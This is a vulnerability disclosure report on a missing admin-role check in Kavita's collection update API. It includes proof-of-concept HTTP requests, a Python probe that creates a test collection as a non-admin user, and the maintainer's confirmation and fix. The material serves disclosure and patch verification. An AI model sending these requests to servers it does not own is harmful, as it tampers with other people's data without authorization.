IDOR allows creating a new collection or modifying an existing one in kareadita/kavita

Valid

Reported on

Aug 8th 2022


Description

A normal (non-administrative) user can create a new collection from a supplied list of book IDs or add new books to an existing collection; both operations are intended to be executed only by an administrator.

This is possible due to a missing administrative role check on the /api/collection/update-for-series API endpoint: the endpoint requires a valid bearer token but does not verify that the caller holds the admin role.

Proof of Concept

Create a new collection:

1 - Send the following request. A collectionTagId value of 0 indicates the creation of a new collection, and the seriesIds array holds the IDs of all the books (series) that will be added to it:

POST http://localhost:5000/api/collection/update-for-series
Authorization: Bearer <token>
Content-Type: application/json

{"collectionTagId":0,"collectionTagTitle":"Collection3","seriesIds":[1,2,3,4,5]}

Add new books to an existing collection:

1 - Send the following request, where collectionTagId holds the ID of the target collection and the seriesIds array holds the IDs of the new books (series) that will be added to it (the collectionTagTitle value also overwrites the collection's title):

POST http://localhost:5000/api/collection/update-for-series
Authorization: Bearer <token>
Content-Type: application/json

{"collectionTagId":<collection-id>,"collectionTagTitle":"New title","seriesIds":[3,4,5]}
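The two requests above, turned into a small probe that a Kavita operator can run with a non-admin account to tell whether an instance still lacks the admin-role check. This is an added example, not Kavita's own code or the researcher's script: the base URL, the token and the series IDs are assumptions supplied by the caller, and the "patched" verdict rests on the endpoint answering 401 or 403 to a non-admin once authorization is enforced.

```python
"""Probe POST /api/collection/update-for-series as a NON-admin user.

Added example, not part of the Kavita project. Assumptions: the caller
supplies a reachable base URL, a bearer token for a normal (non-admin)
user, and series IDs that exist on that instance.
"""
import json
import sys
import urllib.error
import urllib.request

ENDPOINT = "/api/collection/update-for-series"


def build_payload(collection_tag_id, title, series_ids):
    """Body accepted by the endpoint: collectionTagId 0 creates a new
    collection, any positive value targets that existing collection."""
    if not isinstance(collection_tag_id, int) or collection_tag_id < 0:
        raise ValueError("collectionTagId must be 0 (create) or a positive id")
    if not series_ids or any(not isinstance(s, int) or s <= 0 for s in series_ids):
        raise ValueError("seriesIds must be a non-empty list of positive ids")
    return {
        "collectionTagId": collection_tag_id,
        "collectionTagTitle": title,
        "seriesIds": list(series_ids),
    }


def http_send(url, token, body):
    """Real transport: POST the JSON body with a bearer token.
    Returns (HTTP status, response text); 4xx/5xx are returned, not raised."""
    req = urllib.request.Request(
        url,
        data=json.dumps(body).encode("utf-8"),
        headers={
            "Authorization": f"Bearer {token}",
            "Content-Type": "application/json",
        },
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", errors="replace")


def classify(status):
    """Verdict for a request that was sent with a NON-admin token."""
    if status in (401, 403):
        return "patched"        # the role check refused the caller
    if 200 <= status < 300:
        return "vulnerable"     # a normal user wrote to a collection
    return "inconclusive"       # server error, wrong URL, etc.


def check_instance(base_url, user_token, series_ids, send=http_send):
    """Try to create a probe collection as a normal user and classify the
    outcome. `send` is injectable so the logic can run without a server."""
    body = build_payload(0, "authz-probe", series_ids)
    status, _ = send(base_url.rstrip("/") + ENDPOINT, user_token, body)
    return classify(status)


if __name__ == "__main__":
    # usage: probe.py http://localhost:5000 <non-admin token> 1 2 3
    base, token = sys.argv[1], sys.argv[2]
    ids = [int(x) for x in sys.argv[3:]] or [1]
    print(check_instance(base, token, ids))
```

Run it only against an instance you own: on an unpatched server the probe really does create a collection named "authz-probe" containing the given series, which an administrator then has to delete. A 401 or 403 means the endpoint now rejects non-admin callers; any 5xx is reported as inconclusive rather than as a pass.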

Impact

An authenticated attacker holding only a normal user account can create a new collection or modify the contents of an existing one, because the endpoint enforces no authorization check beyond a valid login.

We are processing your report and will contact the kareadita/kavita team within 24 hours. a year ago
We have contacted a member of the kareadita/kavita team and are waiting to hear back a year ago
kareadita/kavita maintainer has acknowledged this report a year ago
Joe Milazzo
a year ago

Maintainer


Is this on v0.5.4 only or on 0.5.4.2 (the new hotfix which addressed your last round of vulnerabilities)?

vultza modified the report
a year ago
vultza
a year ago

Researcher


It targets v0.5.4.2. I just modified the original report, because I submitted this report before the hotfix. The vulnerability still exists, missing an administrative check, but now it is only possible if the attacker is authenticated as a normal user.

Joe Milazzo validated this vulnerability a year ago

I did confirm it, one line of missing code. Fixed locally, planned for next Stable. Thanks again for the report.

vultza has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the kareadita/kavita team. We will try again in 7 days. a year ago
Joe Milazzo marked this as fixed in 0.5.5.0 with commit ae891c a year ago
Joe Milazzo has been awarded the fix bounty
This vulnerability will not receive a CVE